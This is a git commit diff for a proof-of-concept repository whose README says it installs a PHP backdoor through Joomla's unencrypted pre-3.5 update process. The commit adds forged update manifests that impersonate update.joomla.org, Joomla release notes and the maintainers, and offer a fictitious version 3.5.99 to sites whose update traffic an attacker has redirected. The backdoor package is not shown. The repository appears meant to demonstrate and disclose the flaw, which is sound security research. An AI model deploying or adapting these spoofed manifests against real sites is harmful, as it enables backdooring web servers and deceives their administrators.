initial commit

README.md

@@ -1,2 +1,10 @@
 # joomla-nohttps-poc
 Proof of concept to install backdoor via unencrypted Joomla update
+
+# background
+
+The Joomla CMS before version 3.5 used an insecure update process over HTTP.
+
+This is a proof of concept. If you redirect requests to update.joomla.org to an
+HTTP host containing the files in this repo it will show an update to a fictious
+version 3.5.99. This 3.5.99 update will install a trivial PHP backdoor.

core/extension_sts.xml

@@ -0,0 +1,60 @@
+<?xml version="1.0" ?>
+<updates>
+	<update>
+		<name>Joomla! 3.5</name>
+		<description>Joomla! 3.5 CMS</description>
+		<element>joomla</element>
+		<type>file</type>
+		<version>3.5.99</version>
+		<infourl title="Joomla!">https://www.joomla.org/announcements/release-news/5655-joomla-3.5.99-released.html</infourl>
+		<downloads>
+   			<downloadurl type="full" format="zip">https://github.com/joomla/joomla-cms/releases/download/3.5.99/Joomla_3.5.99-Stable-Update_Package.zip</downloadurl>
+		</downloads>
+		<tags>
+			<tag>stable</tag>
+		</tags>
+		<maintainer>Joomla! PLT</maintainer>
+		<maintainerurl>https://www.joomla.org</maintainerurl>
+		<section>STS</section>
+		<targetplatform name="joomla" version="3.3" />
+		<php_minimum>5.3.10</php_minimum>
+	</update>
+    <update>
+   		<name>Joomla! 3.5</name>
+   		<description>Joomla! 3.5 CMS</description>
+   		<element>joomla</element>
+   		<type>file</type>
+   		<version>3.5.99</version>
+		<infourl title="Joomla!">https://www.joomla.org/announcements/release-news/5655-joomla-3.5.99-released.html</infourl>
+   		<downloads>
+   			<downloadurl type="full" format="zip">https://github.com/joomla/joomla-cms/releases/download/3.5.99/Joomla_3.5.99-Stable-Update_Package.zip</downloadurl>
+   		</downloads>
+   		<tags>
+   			<tag>stable</tag>
+   		</tags>
+   		<maintainer>Joomla! PLT</maintainer>
+   		<maintainerurl>https://www.joomla.org</maintainerurl>
+   		<section>STS</section>
+   		<targetplatform name="joomla" version="3.4" />
+   		<php_minimum>5.3.10</php_minimum>
+   	</update>
+  	<update>
+   		<name>Joomla! 3.5</name>
+   		<description>Joomla! 3.5 CMS</description>
+   		<element>joomla</element>
+   		<type>file</type>
+		<infourl title="Joomla!">https://www.joomla.org/announcements/release-news/5655-joomla-3.5.99-released.html</infourl>
+   		<version>3.5.99</version>
+   		<downloads>
+   			<downloadurl type="full" format="zip">http://update.joomla.org/core/Joomla_3.5.x_to_3.5.99-Stable-Patch_Package.zip</downloadurl>
+   		</downloads>
+   		<tags>
+   			<tag>stable</tag>
+   		</tags>
+   		<maintainer>Joomla! PLT</maintainer>
+   		<maintainerurl>https://www.joomla.org</maintainerurl>
+   		<section>STS</section>
+   		<targetplatform name="joomla" version="3.5" />
+   		<php_minimum>5.3.10</php_minimum>
+   	</update>
+</updates>

core/list.xml

@@ -0,0 +1,5 @@
+<extensionset name="Joomla Core" description="Joomla! Core">
+	<extension name="Joomla" element="joomla" type="file" version="3.5.99" targetplatformversion="3.3" detailsurl="http://update.joomla.org/core/extension_sts.xml" />
+	<extension name="Joomla" element="joomla" type="file" version="3.5.99" targetplatformversion="3.4" detailsurl="http://update.joomla.org/core/extension_sts.xml" />
+	<extension name="Joomla" element="joomla" type="file" version="3.5.99" targetplatformversion="3.5" detailsurl="http://update.joomla.org/core/extension_sts.xml" />
+</extensionset>